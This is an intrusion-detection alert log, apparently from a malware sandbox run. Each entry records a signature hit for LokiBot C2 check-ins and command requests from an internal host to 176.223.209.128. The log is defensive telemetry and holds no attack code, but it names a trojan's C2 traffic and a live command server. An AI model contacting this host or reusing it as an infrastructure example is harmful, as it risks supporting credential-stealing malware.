                                              11/25/21-10:54:09.414303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056080192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.910267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056180192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.910267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056180192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.910267TCP2025381ET TROJAN LokiBot Checkin5056180192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.910267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056180192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.396251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056280192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.396251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056280192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.396251TCP2025381ET TROJAN LokiBot Checkin5056280192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.396251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056280192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.902123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056380192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.902123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056380192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.902123TCP2025381ET TROJAN LokiBot Checkin5056380192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.902123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056380192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.424071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056480192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.424071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056480192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.424071TCP2025381ET TROJAN LokiBot Checkin5056480192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.424071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056480192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.949253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056580192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.949253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056580192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.949253TCP2025381ET TROJAN LokiBot Checkin5056580192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.949253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056580192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.442910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056680192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.442910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056680192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.442910TCP2025381ET TROJAN LokiBot Checkin5056680192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.442910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056680192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.904803TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056780192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.904803TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056780192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.904803TCP2025381ET TROJAN LokiBot Checkin5056780192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.904803TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056780192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.432566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056880192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.432566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056880192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.432566TCP2025381ET TROJAN LokiBot Checkin5056880192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.432566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056880192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.930896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056980192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.930896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056980192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.930896TCP2025381ET TROJAN LokiBot Checkin5056980192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.930896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056980192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.436252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057080192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.436252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057080192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.436252TCP2025381ET TROJAN LokiBot Checkin5057080192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.436252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057080192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.939600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057180192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.939600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057180192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.939600TCP2025381ET TROJAN LokiBot Checkin5057180192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.939600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057180192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.422756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057280192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.422756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057280192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.422756TCP2025381ET TROJAN LokiBot Checkin5057280192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.422756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057280192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.874761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057380192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.874761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057380192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.874761TCP2025381ET TROJAN LokiBot Checkin5057380192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.874761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057380192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.294505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057480192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.294505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057480192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.294505TCP2025381ET TROJAN LokiBot Checkin5057480192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.294505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057480192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.790297TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057580192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.790297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057580192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.790297TCP2025381ET TROJAN LokiBot Checkin5057580192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.790297TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057580192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.290043TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057680192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.290043TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057680192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.290043TCP2025381ET TROJAN LokiBot Checkin5057680192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.290043TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057680192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.798373TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057780192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.798373TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057780192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.798373TCP2025381ET TROJAN LokiBot Checkin5057780192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.798373TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057780192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.280836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057880192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.280836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057880192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.280836TCP2025381ET TROJAN LokiBot Checkin5057880192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.280836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057880192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.732676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057980192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.732676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057980192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.732676TCP2025381ET TROJAN LokiBot Checkin5057980192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.732676TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057980192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.228582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058080192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.228582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058080192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.228582TCP2025381ET TROJAN LokiBot Checkin5058080192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.228582TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058080192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.735000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058180192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.735000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058180192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.735000TCP2025381ET TROJAN LokiBot Checkin5058180192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.735000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058180192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.196224TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058280192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.196224TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058280192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.196224TCP2025381ET TROJAN LokiBot Checkin5058280192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.196224TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058280192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.692031TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058380192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.692031TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058380192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.692031TCP2025381ET TROJAN LokiBot Checkin5058380192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.692031TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058380192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.190323TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058480192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.190323TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058480192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.190323TCP2025381ET TROJAN LokiBot Checkin5058480192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.190323TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058480192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.687268TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058580192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.687268TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058580192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.687268TCP2025381ET TROJAN LokiBot Checkin5058580192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.687268TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058580192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.210906TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058680192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.210906TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058680192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.210906TCP2025381ET TROJAN LokiBot Checkin5058680192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.210906TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058680192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.705041TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058780192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.705041TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058780192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.705041TCP2025381ET TROJAN LokiBot Checkin5058780192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.705041TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058780192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.229445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058880192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.229445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058880192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.229445TCP2025381ET TROJAN LokiBot Checkin5058880192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.229445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058880192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.722718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058980192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.722718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058980192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.722718TCP2025381ET TROJAN LokiBot Checkin5058980192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.722718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058980192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.176005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059080192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.176005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059080192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.176005TCP2025381ET TROJAN LokiBot Checkin5059080192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.176005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059080192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.687769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059180192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.687769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059180192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.687769TCP2025381ET TROJAN LokiBot Checkin5059180192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.687769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059180192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.208926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059280192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.208926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059280192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.208926TCP2025381ET TROJAN LokiBot Checkin5059280192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.208926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059280192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.717249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059380192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.717249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059380192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.717249TCP2025381ET TROJAN LokiBot Checkin5059380192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.717249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059380192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.227737TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059480192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.227737TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059480192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.227737TCP2025381ET TROJAN LokiBot Checkin5059480192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.227737TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059480192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.656063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059580192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.656063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059580192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.656063TCP2025381ET TROJAN LokiBot Checkin5059580192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.656063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059580192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.183294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059680192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.183294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059680192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.183294TCP2025381ET TROJAN LokiBot Checkin5059680192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.183294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059680192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.683854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059780192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.683854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059780192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.683854TCP2025381ET TROJAN LokiBot Checkin5059780192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.683854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059780192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.164932TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059880192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.164932TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059880192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.164932TCP2025381ET TROJAN LokiBot Checkin5059880192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.164932TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059880192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.673309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059980192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.673309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059980192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.673309TCP2025381ET TROJAN LokiBot Checkin5059980192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.673309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059980192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.175600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060080192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.175600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060080192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.175600TCP2025381ET TROJAN LokiBot Checkin5060080192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.175600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060080192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.632936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060180192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.632936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060180192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.632936TCP2025381ET TROJAN LokiBot Checkin5060180192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.632936TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060180192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.061319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060280192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.061319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060280192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.061319TCP2025381ET TROJAN LokiBot Checkin5060280192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.061319TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060280192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.580873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060380192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.580873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060380192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.580873TCP2025381ET TROJAN LokiBot Checkin5060380192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.580873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060380192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.098892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060480192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.098892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060480192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.098892TCP2025381ET TROJAN LokiBot Checkin5060480192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.098892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060480192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.612838TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060580192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.612838TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060580192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.612838TCP2025381ET TROJAN LokiBot Checkin5060580192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.612838TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060580192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.118997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060680192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.118997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060680192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.118997TCP2025381ET TROJAN LokiBot Checkin5060680192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.118997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060680192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.556276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060780192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.556276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060780192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.556276TCP2025381ET TROJAN LokiBot Checkin5060780192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.556276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060780192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.057683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060880192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.057683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060880192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.057683TCP2025381ET TROJAN LokiBot Checkin5060880192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.057683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060880192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.558687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060980192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.558687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060980192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.558687TCP2025381ET TROJAN LokiBot Checkin5060980192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.558687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060980192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.080656TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061080192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.080656TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061080192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.080656TCP2025381ET TROJAN LokiBot Checkin5061080192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.080656TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061080192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.588985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061180192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.588985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061180192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.588985TCP2025381ET TROJAN LokiBot Checkin5061180192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.588985TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061180192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.090544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061280192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.090544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061280192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.090544TCP2025381ET TROJAN LokiBot Checkin5061280192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.090544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061280192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.567270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061380192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.567270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061380192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.567270TCP2025381ET TROJAN LokiBot Checkin5061380192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.567270TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061380192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.074487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061480192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.074487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061480192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.074487TCP2025381ET TROJAN LokiBot Checkin5061480192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.074487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061480192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.588960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061580192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.588960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061580192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.588960TCP2025381ET TROJAN LokiBot Checkin5061580192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.588960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061580192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.058855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061680192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.058855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061680192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.058855TCP2025381ET TROJAN LokiBot Checkin5061680192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.058855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061680192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.563383TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061780192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.563383TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061780192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.563383TCP2025381ET TROJAN LokiBot Checkin5061780192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.563383TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061780192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.018762TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061880192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.018762TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061880192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.018762TCP2025381ET TROJAN LokiBot Checkin5061880192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.018762TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061880192.168.11.20176.223.209.128
